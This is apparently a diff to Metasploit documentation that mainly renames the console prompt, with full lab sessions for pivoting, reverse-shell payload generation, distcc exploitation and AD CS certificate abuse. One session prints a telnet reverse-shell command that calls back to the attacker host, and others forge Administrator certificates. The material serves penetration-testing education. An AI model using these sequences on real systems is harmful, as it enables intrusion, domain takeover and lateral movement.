+msf payload(linux/x86/shell_reverse_tcp) > generate -f elf -o linux_shell
 ```

 ### Post modules ({{ site.metasploit_module_counts["post"] }})
@@ -36,8 +36,8 @@ One of the easiest ways to do this is to use the `post/multi/manage/autoroute` m
 ```msf
 meterpreter > background
 [*] Backgrounding session 1...
-msf6 exploit(multi/handler) > use post/multi/manage/autoroute
-msf6 post(multi/manage/autoroute) > show options
+msf exploit(multi/handler) > use post/multi/manage/autoroute
+msf post(multi/manage/autoroute) > show options

 Module options (post/multi/manage/autoroute):

@@ -49,13 +49,13 @@ Module options (post/multi/manage/autoroute):
   SESSION                   yes       The session to run this module on
   SUBNET                    no        Subnet (IPv4, for example, 10.10.10.0)

-msf6 post(multi/manage/autoroute) > set SESSION 1
+msf post(multi/manage/autoroute) > set SESSION 1
 SESSION => 1
-msf6 post(multi/manage/autoroute) > set SUBNET 169.254.0.0
+msf post(multi/manage/autoroute) > set SUBNET 169.254.0.0
 SUBNET => 169.254.0.0
-msf6 post(multi/manage/autoroute) > set NETMASK /16
+msf post(multi/manage/autoroute) > set NETMASK /16
 NETMASK => /16
-msf6 post(multi/manage/autoroute) > show options
+msf post(multi/manage/autoroute) > show options

 Module options (post/multi/manage/autoroute):

@@ -67,7 +67,7 @@ Module options (post/multi/manage/autoroute):
   SESSION  1                yes       The session to run this module on
   SUBNET   169.254.0.0      no        Subnet (IPv4, for example, 10.10.10.0)

-msf6 post(multi/manage/autoroute) > run
+msf post(multi/manage/autoroute) > run

 [!] SESSION may not be compatible with this module:
 [!]  * incompatible session platform: windows
@@ -76,12 +76,12 @@ msf6 post(multi/manage/autoroute) > run
 [+] Route added to subnet 169.254.0.0/255.255.0.0 from host's routing table.
 [+] Route added to subnet 172.19.176.0/255.255.240.0 from host's routing table.
 [*] Post module execution completed
-msf6 post(multi/manage/autoroute) >
+msf post(multi/manage/autoroute) >
 ```
 If we now use Meterpreter's `route` command we can see that we have two route table entries within Metasploit's routing table, that are tied to Session 1, aka the session on the Windows 11 machine. This means anytime we want to contact a machine within one of the networks specified, we will go through Session 1 and use that to connect to the targets.

 ```msf
-msf6 post(multi/manage/autoroute) > route
+msf post(multi/manage/autoroute) > route

 IPv4 Active Routing Table
 =========================
@@ -92,16 +92,16 @@ IPv4 Active Routing Table
   172.19.176.0       255.255.240.0      Session 1

 [*] There are currently no IPv6 routes defined.
-msf6 post(multi/manage/autoroute) >
+msf post(multi/manage/autoroute) >
 ```

 All right so that's one way, but what if we wanted to do this manually? First off to flush all routes from the routing table, we will do `route flush` followed by `route` to double check we have successfully removed the entries.

 ```msf
-msf6 post(multi/manage/autoroute) > route flush
-msf6 post(multi/manage/autoroute) > route
+msf post(multi/manage/autoroute) > route flush
+msf post(multi/manage/autoroute) > route
 [*] There are currently no routes defined.
-msf6 post(multi/manage/autoroute) >
+msf post(multi/manage/autoroute) >
 ```
 Now lets trying doing the same thing manually.

@@ -109,13 +109,13 @@ Now lets trying doing the same thing manually.
 Here we can use `route add <IP ADDRESS OF SUBNET> <NETMASK> <GATEWAY>` to add the routes from within Metasploit, followed by `route print` to then print all the routes that Metasploit knows about. Note that the Gateway parameter is either an IP address to use as the gateway or as is more commonly the case, the session ID of an existing session to use to pivot the traffic through.

 ```msf
-msf6 post(multi/manage/autoroute) > route add 169.254.0.0 255.255.0.0 1
+msf post(multi/manage/autoroute) > route add 169.254.0.0 255.255.0.0 1
 [*] Route added
-msf6 post(multi/manage/autoroute) > route add 172.19.176.0 255.255.240 1
+msf post(multi/manage/autoroute) > route add 172.19.176.0 255.255.240 1
 [-] Invalid gateway
-msf6 post(multi/manage/autoroute) > route add 172.19.176.0 255.255.240.0 1
+msf post(multi/manage/autoroute) > route add 172.19.176.0 255.255.240.0 1
 [*] Route added
-msf6 post(multi/manage/autoroute) > route print
+msf post(multi/manage/autoroute) > route print

 IPv4 Active Routing Table
 =========================
@@ -126,15 +126,15 @@ IPv4 Active Routing Table
   172.19.176.0       255.255.240.0      Session 1

 [*] There are currently no IPv6 routes defined.
-msf6 post(multi/manage/autoroute) >
+msf post(multi/manage/autoroute) >
 ```

 Finally we can check that the route will use session 1 by using `route get 169.254.204.110`

 ```msf
-msf6 post(multi/manage/autoroute) > route get 169.254.204.110
+msf post(multi/manage/autoroute) > route get 169.254.204.110
 169.254.204.110 routes through: Session 1
-msf6 post(multi/manage/autoroute) >
+msf post(multi/manage/autoroute) >
 ```

 If we want to then remove a specific route (such as in this case we want to remove the 172.19.176.0/20 route since we don't need that for this test), we can issue the `route del` or `route remove` commands with the syntax `route remove <IP ADDRESS OF SUBNET><NETMASK IN SLASH FORMAT> <GATEWAY>`
@@ -142,9 +142,9 @@ If we want to then remove a specific route (such as in this case we want to remo
 Example:

 ```msf
-msf6 post(multi/manage/autoroute) > route remove 172.19.176.0/20 1
+msf post(multi/manage/autoroute) > route remove 172.19.176.0/20 1
 [*] Route removed
-msf6 post(multi/manage/autoroute) > route
+msf post(multi/manage/autoroute) > route

 IPv4 Active Routing Table
 =========================
@@ -154,14 +154,14 @@ IPv4 Active Routing Table
   169.254.0.0        255.255.0.0        Session 1

 [*] There are currently no IPv6 routes defined.
-msf6 post(multi/manage/autoroute) >
+msf post(multi/manage/autoroute) >
 ```

 ## Using the Pivot
 At this point we can now use the pivot with any Metasploit modules as shown below:

 ```msf
-msf6 exploit(windows/http/exchange_chainedserializationbinder_denylist_typo_rce) > show options
+msf exploit(windows/http/exchange_chainedserializationbinder_denylist_typo_rce) > show options

 Module options (exploit/windows/http/exchange_chainedserializationbinder_denylist_typo_rce):

@@ -208,11 +208,11 @@ Exploit target:
   0   Windows Command


-msf6 exploit(windows/http/exchange_chainedserializationbinder_denylist_typo_rce) > check
+msf exploit(windows/http/exchange_chainedserializationbinder_denylist_typo_rce) > check

 [*] Target is an Exchange Server!
 [*] 169.254.204.110:443 - The target is not exploitable. Exchange Server 15.2.986.14 does not appear to be a vulnerable version!
-msf6 exploit(windows/http/exchange_chainedserializationbinder_denylist_typo_rce) >
+msf exploit(windows/http/exchange_chainedserializationbinder_denylist_typo_rce) >
 ```

 ## SMB Named Pipe Pivoting in Meterpreter
@@ -222,23 +222,23 @@ The Windows Meterpreter payload supports lateral movement in a network through S
 First open a Windows Meterpreter session to the pivot machine:

 ```msf
-msf6 > use payload/windows/x64/meterpreter/reverse_tcp
-smsf6 payload(windows/x64/meterpreter/reverse_tcp) > set lhost 172.19.182.171
+msf > use payload/windows/x64/meterpreter/reverse_tcp
+smsf payload(windows/x64/meterpreter/reverse_tcp) > set lhost 172.19.182.171
 lhost => 172.19.182.171
-msf6 payload(windows/x64/meterpreter/reverse_tcp) > set lport 4578
+msf payload(windows/x64/meterpreter/reverse_tcp) > set lport 4578
 lport => 4578
-msf6 payload(windows/x64/meterpreter/reverse_tcp) > to_handler
+msf payload(windows/x64/meterpreter/reverse_tcp) > to_handler
 [*] Payload Handler Started as Job 0

 [*] Started reverse TCP handler on 172.19.182.171:4578 
-msf6 payload(windows/x64/meterpreter/reverse_tcp) > [*] Sending stage (200774 bytes) to 172.19.185.34
+msf payload(windows/x64/meterpreter/reverse_tcp) > [*] Sending stage (200774 bytes) to 172.19.185.34
 [*] Meterpreter session 1 opened (172.19.182.171:4578 -> 172.19.185.34:49674) at 2022-06-09 13:23:03 -0500
 ```

 Create named pipe pivot listener on the pivot machine, setting `-l` to the pivot's bind address:

 ```msf
-msf6 payload(windows/x64/meterpreter/reverse_tcp) > sessions -i -1
+msf payload(windows/x64/meterpreter/reverse_tcp) > sessions -i -1
 [*] Starting interaction with 1...

 meterpreter > pivot add -t pipe -l 169.254.16.221 -n msf-pipe -a x64 -p windows
@@ -250,7 +250,7 @@ meterpreter > background
 Now generate a separate payload that will connect back through the pivot machine. This payload will be executed on the final target machine.  Note there is no need to start a handler for the named pipe payload.

 ```msf
-msf6 payload(windows/x64/meterpreter/reverse_named_pipe) > show options
+msf payload(windows/x64/meterpreter/reverse_named_pipe) > show options

 Module options (payload/windows/x64/meterpreter/reverse_named_pipe):

@@ -260,17 +260,17 @@ Module options (payload/windows/x64/meterpreter/reverse_named_pipe):
   PIPEHOST  .                yes       Host of the pipe to connect to
   PIPENAME  msf-pipe         yes       Name of the pipe to listen on

-msf6 payload(windows/x64/meterpreter/reverse_named_pipe) > set pipehost 169.254.16.221
+msf payload(windows/x64/meterpreter/reverse_named_pipe) > set pipehost 169.254.16.221
 pipehost => 169.254.16.221
-msf6 payload(windows/x64/meterpreter/reverse_named_pipe) > generate -f exe -o revpipe_meterpreter_msfpipe.exe
+msf payload(windows/x64/meterpreter/reverse_named_pipe) > generate -f exe -o revpipe_meterpreter_msfpipe.exe
 [*] Writing 7168 bytes to revpipe_meterpreter_msfpipe.exe...
 ```

 After running the payload on the final target machine a new session will open, via the Windows 11 169.254.16.221 pivot.
 ```msf
-msf6 payload(windows/x64/meterpreter/reverse_named_pipe) > [*] Meterpreter session 2 opened (Pivot via [172.19.182.171:4578 -> 169.254.16.221:49674]) at 2022-06-09 13:34:32 -0500
+msf payload(windows/x64/meterpreter/reverse_named_pipe) > [*] Meterpreter session 2 opened (Pivot via [172.19.182.171:4578 -> 169.254.16.221:49674]) at 2022-06-09 13:34:32 -0500

-msf6 payload(windows/x64/meterpreter/reverse_named_pipe) > sessions
+msf payload(windows/x64/meterpreter/reverse_named_pipe) > sessions

 Active sessions
 ===============
@@ -384,8 +384,8 @@ Once routes are established, Metasploit modules can access the IP range specifie
 Metasploit can launch a SOCKS proxy server using the module: `auxiliary/server/socks_proxy`. When set up to bind to a local loopback adapter, applications can be directed to use the proxy to route TCP/IP traffic through Metasploit's routing tables. Here is an example of how this module might be used:

 ```msf
-msf6 > use auxiliary/server/socks_proxy
-msf6 auxiliary(server/socks_proxy) > show options
+msf > use auxiliary/server/socks_proxy
+msf auxiliary(server/socks_proxy) > show options

 Module options (auxiliary/server/socks_proxy):

@@ -407,16 +407,16 @@ Auxiliary action:
   Proxy  Run a SOCKS proxy server


-msf6 auxiliary(server/socks_proxy) > set SRVHOST 127.0.0.1
+msf auxiliary(server/socks_proxy) > set SRVHOST 127.0.0.1
 SRVHOST => 127.0.0.1
-msf6 auxiliary(server/socks_proxy) > set SRVPORT 1080
+msf auxiliary(server/socks_proxy) > set SRVPORT 1080
 SRVPORT => 1080
-msf6 auxiliary(server/socks_proxy) > run
+msf auxiliary(server/socks_proxy) > run
 [*] Auxiliary module running as background job 0.
-msf6 auxiliary(server/socks_proxy) >
+msf auxiliary(server/socks_proxy) >
 [*] Starting the SOCKS proxy server

-msf6 auxiliary(server/socks_proxy) > jobs
+msf auxiliary(server/socks_proxy) > jobs

 Jobs
 ====
@@ -425,7 +425,7 @@ Jobs
  --  ----                           -------  ------------
  0   Auxiliary: server/socks_proxy

-msf6 auxiliary(server/socks_proxy) >
+msf auxiliary(server/socks_proxy) >
 ```

 ### proxychains-ng Setup
@@ -18,7 +18,7 @@ Assuming you have installed Metasploit, either with the official Rapid7 nightly

 Metasploit Documentation: https://docs.metasploit.com/

-msf6 >
+msf >
 ```

 ### Finding modules
@@ -33,7 +33,7 @@ Metasploit is based around the concept of [[modules]]. The most commonly used mo
 You can use the `search` command to search for modules:

 ```msf
-msf6 > search type:auxiliary http html title tag
+msf > search type:auxiliary http html title tag

 Matching Modules
 ================
@@ -45,15 +45,15 @@ Matching Modules

 Interact with a module by name or index. For example info 0, use 0 or use auxiliary/scanner/http/title

-msf6 >
+msf >
 ```

 You can `use` a Metasploit module by specifying the full module name. The prompt will be updated to indicate the currently
 active module:

 ```msf
-msf6 > use auxiliary/scanner/http/title
-msf6 auxiliary(scanner/http/title) > 
+msf > use auxiliary/scanner/http/title
+msf auxiliary(scanner/http/title) > 
 ```

 ### Running Auxiliary modules
@@ -62,14 +62,14 @@ Auxiliary modules do not exploit a target, but can perform data gathering or adm
 extracting the HTTP title from a server:

 ```msf
-msf6 > use auxiliary/scanner/http/title
-msf6 auxiliary(scanner/http/title) > 
+msf > use auxiliary/scanner/http/title
+msf auxiliary(scanner/http/title) > 
 ```

 Each module offers configurable options which can be viewed with the `show options`, or aliased `options`, command:

 ```msf
-msf6 auxiliary(scanner/http/title) > show options
+msf auxiliary(scanner/http/title) > show options

 Module options (auxiliary/scanner/http/title):

@@ -88,21 +88,21 @@ Module options (auxiliary/scanner/http/title):

 View the full module info with the info, or info -d command.

-msf6 auxiliary(scanner/http/title) > 
+msf auxiliary(scanner/http/title) > 
 ```

 To set a module option, use the `set command`. We will set the `RHOST` option - which represents the target host(s) that 
 the module will run against:

 ```msf
-msf6 auxiliary(scanner/http/title) > set RHOSTS google.com
+msf auxiliary(scanner/http/title) > set RHOSTS google.com
 RHOSTS => google.com
 ```

 The `run` command will run the module against the target, showing the target's HTTP title:

 ```msf
-msf6 auxiliary(scanner/http/title) > run
+msf auxiliary(scanner/http/title) > run

 [+] [142.250.180.14:80] [C:301] [R:http://www.google.com/] [S:gws] 301 Moved
 [*] Scanned 1 of 1 hosts (100% complete)
@@ -113,7 +113,7 @@ New in Metasploit 6 there is added support for running modules with options set
 both `RHOSTS` and enabling `HttpTrace` functionality:

 ```msf
-msf6 auxiliary(scanner/http/title) > run rhosts=google.com httptrace=true 
+msf auxiliary(scanner/http/title) > run rhosts=google.com httptrace=true 

 ####################
 # Request:
@@ -142,7 +142,7 @@ The document has moved
 [+] [142.250.180.14:80] [C:301] [R:http://www.google.com/] [S:gws] 301 Moved
 [*] Scanned 1 of 1 hosts (100% complete)
 [*] Auxiliary module execution completed
-msf6 auxiliary(scanner/http/title) > 
+msf auxiliary(scanner/http/title) > 
 ```

 ### Running exploit modules
@@ -156,9 +156,9 @@ For instance in a Virtual Machine, or with Docker. There are multiple pre-built
 For instance - targeting a vulnerable Metasploitable2 VM and using the `unix/misc/distcc_exec` module:

 ```msf
-msf6 > use unix/misc/distcc_exec
+msf > use unix/misc/distcc_exec
 [*] Using configured payload cmd/unix/reverse_bash
-msf6 exploit(unix/misc/distcc_exec) > 
+msf exploit(unix/misc/distcc_exec) > 
 ```

 Exploit modules will generally at a minimum require the following options to be set:
@@ -170,7 +170,7 @@ Exploit modules will generally at a minimum require the following options to be
 Each module offers configurable options which can be viewed with the `show options`, or aliased `options`, command:

 ```msf
-msf6 exploit(unix/misc/distcc_exec) > options
+msf exploit(unix/misc/distcc_exec) > options

 Module options (exploit/unix/misc/distcc_exec):

@@ -198,24 +198,24 @@ Exploit target:

 View the full module info with the info, or info -d command.

-msf6 exploit(unix/misc/distcc_exec) > 
+msf exploit(unix/misc/distcc_exec) > 
 ```

 For this scenario you can manually set each of the required option values (`RHOST`, `LHOST`, and optionally `PAYLOAD`):

 ```msf
-msf6 exploit(unix/misc/distcc_exec) > set rhost 192.168.123.133
+msf exploit(unix/misc/distcc_exec) > set rhost 192.168.123.133
 rhost => 192.168.123.133
-msf6 exploit(unix/misc/distcc_exec) > set lhost 192.168.123.1
+msf exploit(unix/misc/distcc_exec) > set lhost 192.168.123.1
 lhost => 192.168.123.1
-msf6 exploit(unix/misc/distcc_exec) > set payload cmd/unix/reverse
+msf exploit(unix/misc/distcc_exec) > set payload cmd/unix/reverse
 payload => cmd/unix/reverse
 ```

 The `run` command will run the module against the target, there is also an aliased `exploit` command which will perform the same action:

 ```msf
-msf6 exploit(unix/misc/distcc_exec) > run
+msf exploit(unix/misc/distcc_exec) > run

 [+] sh -c '(sleep 4375|telnet 192.168.123.1 4444|while : ; do sh && break; done 2>&1|telnet 192.168.123.1 4444 >/dev/null 2>&1 &)'
 [*] Started reverse TCP double handler on 192.168.123.1:4444 
@@ -238,7 +238,7 @@ daemon
 New in Metasploit 6 there is added support for running modules with options set as part of the run command:

 ```msf
-msf6 exploit(unix/misc/distcc_exec) > run rhost=192.168.123.133 lhost=192.168.123.1 payload=cmd/unix/reverse
+msf exploit(unix/misc/distcc_exec) > run rhost=192.168.123.133 lhost=192.168.123.1 payload=cmd/unix/reverse

 [+] sh -c '(sleep 4305|telnet 192.168.123.1 4444|while : ; do sh && break; done 2>&1|telnet 192.168.123.1 4444 >/dev/null 2>&1 &)'
 [*] Started reverse TCP double handler on 192.168.123.1:4444
@@ -163,7 +163,7 @@ Start `msfconsole` and verify postgresql connection using the `db_status` comman
 mv ~/.msf4/config ~/.msf4/config.disable
 ./msfconsole
 ...
-msf5 > db_status 
+msf > db_status 
 [*] Connected to msf. Connection type: postgresql.
 ```

@@ -171,4 +171,4 @@ Drop (delete) the cluster:

 ```
 PG_CLUSTER_CONF_ROOT=$HOME/.local/etc/postgresql pg_dropcluster 9.6 msf
-```
+```
@@ -14,6 +14,11 @@ flowchart TD
        ESC8(ESC8)
        ESC8 --> web_enrollment[<i>Issuance via Web Enrollment</i>]
    end
+    subgraph esc_update_ldap_object[<b>esc_update_ldap_object</b>]
+        ESC9(ESC9) --> weak_certificate_mapping[<i>Issuance via Weak Certificate Mapping</i>]
+        ESC10(ESC10) --> weak_certificate_mapping[<i>Issuance via Weak Certificate Mapping</i>]
+        ESC16(ESC16) --> weak_certificate_mapping[<i>Issuance via Weak Certificate Mapping</i>]
+    end
    subgraph icpr_cert[<b>icpr_cert</b>]
        ESC1(ESC1)
        ESC2(ESC2)
@@ -51,6 +56,8 @@ flowchart TD
    update_template --> ESC1
    web_enrollment --> PKINIT
    web_enrollment --> SCHANNEL
+    weak_certificate_mapping --> PKINIT
+    weak_certificate_mapping --> SCHANNEL
 ```

 The chart above showcases how one can go about attacking each of the AD CS vulnerabilities supported by Metasploit,
@@ -94,11 +101,13 @@ Later, additional techniques were disclosed by security researchers:
  `StrongCertificateBindingEnforcement` not set to 2 or `CertificateMappingMethods` contains `UPN` flag.
  - [Certipy 4.0: ESC9 & ESC10, BloodHound GUI, New Authentication and Request Methods — and
    more!](https://research.ifcr.dk/certipy-4-0-esc9-esc10-bloodhound-gui-new-authentication-and-request-methods-and-more-7237d88061f7)
+  - [[Exploit Steps|attacking-ad-cs-esc-vulnerabilities.md#exploiting-esc9]]
 - ESC10 - Weak Certificate Mappings - `HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SecurityProviders\Schannel
  CertificateMappingMethods` contains `UPN` bit aka `0x4` or `HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Kdc
  StrongCertificateBindingEnforcement` is set to `0`.
  - [Certipy 4.0: ESC9 & ESC10, BloodHound GUI, New Authentication and Request Methods — and
    more!](https://research.ifcr.dk/certipy-4-0-esc9-esc10-bloodhound-gui-new-authentication-and-request-methods-and-more-7237d88061f7)
+  - [[Exploit Steps|attacking-ad-cs-esc-vulnerabilities.md#exploiting-esc10]]
 - ESC11 - Relaying NTLM to ICPR - Relaying NTLM authentication to unprotected RPC interface is allowed due to lack of
  the `IF_ENFORCEENCRYPTICERTREQUEST` flag on `Config.CA.Interface.Flags`.
  - [Relaying to AD Certificate Services over
@@ -115,9 +124,10 @@ Later, additional techniques were disclosed by security researchers:
  manipulation
  - [EKUwu: Not just another AD CS ESC](https://trustedsec.com/blog/ekuwu-not-just-another-ad-cs-esc)
  - [[Exploit Steps|attacking-ad-cs-esc-vulnerabilities.md#exploiting-esc15]]
-
-Currently, Metasploit only supports attacking ESC1, ESC2, ESC3, ESC4, ESC8, ESC13 and ESC15. As such, this page only
-covers exploiting that subset of ESC flaws.
+- ESC16 - Security Extension Disabled on CA (Globally)
+  - [ESC16 - Security Extension Disabled on CA](https://github.com/ly4k/Certipy/wiki/06-%E2%80%90-Privilege-Escalation#esc16-security-extension-disabled-on-ca-globally)
+Currently, Metasploit only supports attacking ESC1, ESC2, ESC3, ESC4, ESC8, ESC9, ESC10, ESC13, ESC15 and ESC16.
+- [[Exploit Steps|attacking-ad-cs-esc-vulnerabilities.md#exploiting-esc16]]

 Before continuing, it should be noted that ESC1 is slightly different than ESC2 and ESC3
 as the diagram notes above. This is because in ESC1, one has control over the
@@ -207,8 +217,8 @@ This will cause the module to log into the LDAP server on the target DC, and lis
 as well as the permissions that are required to enroll in these certificate templates. The following is a sample output of running this against a test server:

 ```msf
-msf6 > use auxiliary/gather/ldap_esc_vulnerable_cert_finder
-msf6 auxiliary(gather/ldap_esc_vulnerable_cert_finder) > show options
+msf > use auxiliary/gather/ldap_esc_vulnerable_cert_finder
+msf auxiliary(gather/ldap_esc_vulnerable_cert_finder) > show options

 Module options (auxiliary/gather/ldap_esc_vulnerable_cert_finder):

@@ -229,15 +239,15 @@ Module options (auxiliary/gather/ldap_esc_vulnerable_cert_finder):

 View the full module info with the info, or info -d command.

-msf6 auxiliary(gather/ldap_esc_vulnerable_cert_finder) > set DOMAIN DAFOREST
+msf auxiliary(gather/ldap_esc_vulnerable_cert_finder) > set DOMAIN DAFOREST
 DOMAIN => DAFOREST
-msf6 auxiliary(gather/ldap_esc_vulnerable_cert_finder) > set USERNAME normaluser
+msf auxiliary(gather/ldap_esc_vulnerable_cert_finder) > set USERNAME normaluser
 USERNAME => normaluser
-msf6 auxiliary(gather/ldap_esc_vulnerable_cert_finder) > set PASSWORD normalpass
+msf auxiliary(gather/ldap_esc_vulnerable_cert_finder) > set PASSWORD normalpass
 PASSWORD => normalpass
-msf6 auxiliary(gather/ldap_esc_vulnerable_cert_finder) > set RHOSTS 172.30.239.85
+msf auxiliary(gather/ldap_esc_vulnerable_cert_finder) > set RHOSTS 172.30.239.85
 RHOSTS => 172.30.239.85
-msf6 auxiliary(gather/ldap_esc_vulnerable_cert_finder) > run
+msf auxiliary(gather/ldap_esc_vulnerable_cert_finder) > run
 [*] Running module against 172.30.239.85

 [*] Discovering base DN automatically
@@ -318,7 +328,7 @@ msf6 auxiliary(gather/ldap_esc_vulnerable_cert_finder) > run
 [*]     Enrollment SIDs:
 [*]       * S-1-5-11 (Authenticated Users)
 [*] Auxiliary module execution completed
-msf6 auxiliary(gather/ldap_esc_vulnerable_cert_finder) >
+msf auxiliary(gather/ldap_esc_vulnerable_cert_finder) >
 ```

 From the output above we can determine that the SubCA certificate template is vulnerable to several attacks. However,
@@ -357,24 +367,24 @@ If we know the domain name is `daforest.com` and the domain administrator of thi
 quickly set this up:

 ```msf
-msf6 > use auxiliary/admin/dcerpc/icpr_cert
-msf6 auxiliary(admin/dcerpc/icpr_cert) > set CA daforest-WIN-BR0CCBA815B-CA
+msf > use auxiliary/admin/dcerpc/icpr_cert
+msf auxiliary(admin/dcerpc/icpr_cert) > set CA daforest-WIN-BR0CCBA815B-CA
 CA => daforest-WIN-BR0CCBA815B-CA
-msf6 auxiliary(admin/dcerpc/icpr_cert) > set CERT_TEMPLATE ESC1-Template
+msf auxiliary(admin/dcerpc/icpr_cert) > set CERT_TEMPLATE ESC1-Template
 CERT_TEMPLATE => ESC1-Template
-msf6 auxiliary(admin/dcerpc/icpr_cert) > set RHOSTS 172.30.239.85
+msf auxiliary(admin/dcerpc/icpr_cert) > set RHOSTS 172.30.239.85
 RHOSTS => 172.30.239.85
-msf6 auxiliary(admin/dcerpc/icpr_cert) > set SMBDomain DAFOREST
+msf auxiliary(admin/dcerpc/icpr_cert) > set SMBDomain DAFOREST
 SMBDomain => DAFOREST
-msf6 auxiliary(admin/dcerpc/icpr_cert) > set SMBPass normalpass
+msf auxiliary(admin/dcerpc/icpr_cert) > set SMBPass normalpass
 SMBPass => normalpass
-msf6 auxiliary(admin/dcerpc/icpr_cert) > set SMBUser normaluser
+msf auxiliary(admin/dcerpc/icpr_cert) > set SMBUser normaluser
 SMBUser => normaluser
-msf6 auxiliary(admin/dcerpc/icpr_cert) > set ALT_SID S-1-5-21-3402587289-1488798532-3618296993-1000
+msf auxiliary(admin/dcerpc/icpr_cert) > set ALT_SID S-1-5-21-3402587289-1488798532-3618296993-1000
 ALT_SID => S-1-5-21-3402587289-1488798532-3618296993-1000
-msf6 auxiliary(admin/dcerpc/icpr_cert) > set ALT_UPN Administrator@daforest.com
+msf auxiliary(admin/dcerpc/icpr_cert) > set ALT_UPN Administrator@daforest.com
 ALT_UPN => Administrator@daforest.com
-msf6 auxiliary(admin/dcerpc/icpr_cert) > run
+msf auxiliary(admin/dcerpc/icpr_cert) > run
 [*] Running module against 172.30.239.85

 [*] 172.30.239.85:445 - Requesting a certificate...
@@ -383,7 +393,7 @@ msf6 auxiliary(admin/dcerpc/icpr_cert) > run
 [*] 172.30.239.85:445 - Certificate UPN: Administrator@daforest.com
 [*] 172.30.239.85:445 - Certificate stored at: /home/gwillcox/.msf4/loot/20221216143830_default_unknown_windows.ad.cs_338144.pfx
 [*] Auxiliary module execution completed
-msf6 auxiliary(admin/dcerpc/icpr_cert) >
+msf auxiliary(admin/dcerpc/icpr_cert) >
 ```

 We can then use the `kerberos/get_ticket` module to gain a Kerberos ticket granting ticket (TGT) as the `Administrator`
@@ -401,20 +411,20 @@ To do this we will use the `ipcr_cert` module and we will set the usual options,
 For the first run, we will set the usual `RHOSTS`, `CA`, and `CERT_TEMPLATE` details, being sure to set `CERT_TEMPLATE` to the vulnerable `ESC2-Template` certificate template, and supply valid SMB login credentials. This will grant us a certificate for our current user that is based off of the vulnerable `ESC2-Template`:

 ```msf
-msf6 > use auxiliary/admin/dcerpc/icpr_cert
-msf6 auxiliary(admin/dcerpc/icpr_cert) > set RHOSTS 172.30.239.85
+msf > use auxiliary/admin/dcerpc/icpr_cert
+msf auxiliary(admin/dcerpc/icpr_cert) > set RHOSTS 172.30.239.85
 RHOSTS => 172.30.239.85
-msf6 auxiliary(admin/dcerpc/icpr_cert) > set CA daforest-WIN-BR0CCBA815B-CA
+msf auxiliary(admin/dcerpc/icpr_cert) > set CA daforest-WIN-BR0CCBA815B-CA
 CA => daforest-WIN-BR0CCBA815B-CA
-msf6 auxiliary(admin/dcerpc/icpr_cert) > set CERT_TEMPLATE ESC2-Template
+msf auxiliary(admin/dcerpc/icpr_cert) > set CERT_TEMPLATE ESC2-Template
 CERT_TEMPLATE => ESC2-Template
-msf6 auxiliary(admin/dcerpc/icpr_cert) > set SMBDomain DAFOREST
+msf auxiliary(admin/dcerpc/icpr_cert) > set SMBDomain DAFOREST
 SMBDomain => DAFOREST
-msf6 auxiliary(admin/dcerpc/icpr_cert) > set SMBPass normalpass
+msf auxiliary(admin/dcerpc/icpr_cert) > set SMBPass normalpass
 SMBPass => normalpass
-msf6 auxiliary(admin/dcerpc/icpr_cert) > set SMBUser normaluser
+msf auxiliary(admin/dcerpc/icpr_cert) > set SMBUser normaluser
 SMBUser => normaluser
-msf6 auxiliary(admin/dcerpc/icpr_cert) > show options
+msf auxiliary(admin/dcerpc/icpr_cert) > show options

 Module options (auxiliary/admin/dcerpc/icpr_cert):

@@ -444,7 +454,7 @@ Auxiliary action:

 View the full module info with the info, or info -d command.

-msf6 auxiliary(admin/dcerpc/icpr_cert) > run
+msf auxiliary(admin/dcerpc/icpr_cert) > run
 [*] Running module against 172.30.239.85

 [*] 172.30.239.85:445 - Requesting a certificate...
@@ -453,7 +463,7 @@ msf6 auxiliary(admin/dcerpc/icpr_cert) > run
 [*] 172.30.239.85:445 - Certificate SID: S-1-5-21-3290009963-1772292745-3260174523-1611
 [*] 172.30.239.85:445 - Certificate stored at: /home/gwillcox/.msf4/loot/20221216154930_default_unknown_windows.ad.cs_104207.pfx
 [*] Auxiliary module execution completed
-msf6 auxiliary(admin/dcerpc/icpr_cert) > loot
+msf auxiliary(admin/dcerpc/icpr_cert) > loot

 Loot
 ====
@@ -462,13 +472,13 @@ host  service  type           name             content               info
 ----  -------  ----           ----             -------               ----                         ----
               windows.ad.cs  certificate.pfx  application/x-pkcs12  DAFOREST\normal Certificate  /home/gwillcox/.msf4/loot/20221216154930_default_unknown_windows.ad.cs_104207.pfx

-msf6 auxiliary(admin/dcerpc/icpr_cert) >
+msf auxiliary(admin/dcerpc/icpr_cert) >
 ```

 Next, we need to use the PFX file that we got to request another certificate to authenticate on behalf of another user. We will use the `PFX` option to specify the PFX file, and the `ON_BEHALF_OF` setting to specify the user we would like to authenticate on behalf of. Finally we will change the certificate template to another certificate template that we are able to enroll in. The default `User` certificate should work here since it allows enrollment by any authenticated domain user.

 ```msf
-msf6 auxiliary(admin/dcerpc/icpr_cert) > show options
+msf auxiliary(admin/dcerpc/icpr_cert) > show options

 Module options (auxiliary/admin/dcerpc/icpr_cert):

@@ -498,13 +508,13 @@ Auxiliary action:

 View the full module info with the info, or info -d command.

-msf6 auxiliary(admin/dcerpc/icpr_cert) > set ON_BEHALF_OF DAFOREST\\Administrator
+msf auxiliary(admin/dcerpc/icpr_cert) > set ON_BEHALF_OF DAFOREST\\Administrator
 ON_BEHALF_OF => DAFOREST\Administrator
-msf6 auxiliary(admin/dcerpc/icpr_cert) > set PFX /home/gwillcox/.msf4/loot/20221216154930_default_unknown_windows.ad.cs_104207.pfx
+msf auxiliary(admin/dcerpc/icpr_cert) > set PFX /home/gwillcox/.msf4/loot/20221216154930_default_unknown_windows.ad.cs_104207.pfx
 PFX => /home/gwillcox/.msf4/loot/20221216154930_default_unknown_windows.ad.cs_104207.pfx
-msf6 auxiliary(admin/dcerpc/icpr_cert) > set CERT_TEMPLATE User
+msf auxiliary(admin/dcerpc/icpr_cert) > set CERT_TEMPLATE User
 CERT_TEMPLATE => User
-msf6 auxiliary(admin/dcerpc/icpr_cert) > show options
+msf auxiliary(admin/dcerpc/icpr_cert) > show options

 Module options (auxiliary/admin/dcerpc/icpr_cert):

@@ -537,7 +547,7 @@ Auxiliary action:

 View the full module info with the info, or info -d command.

-msf6 auxiliary(admin/dcerpc/icpr_cert) > run
+msf auxiliary(admin/dcerpc/icpr_cert) > run
 [*] Running module against 172.30.239.85

 [*] 172.30.239.85:445 - Requesting a certificate...
@@ -546,7 +556,7 @@ msf6 auxiliary(admin/dcerpc/icpr_cert) > run
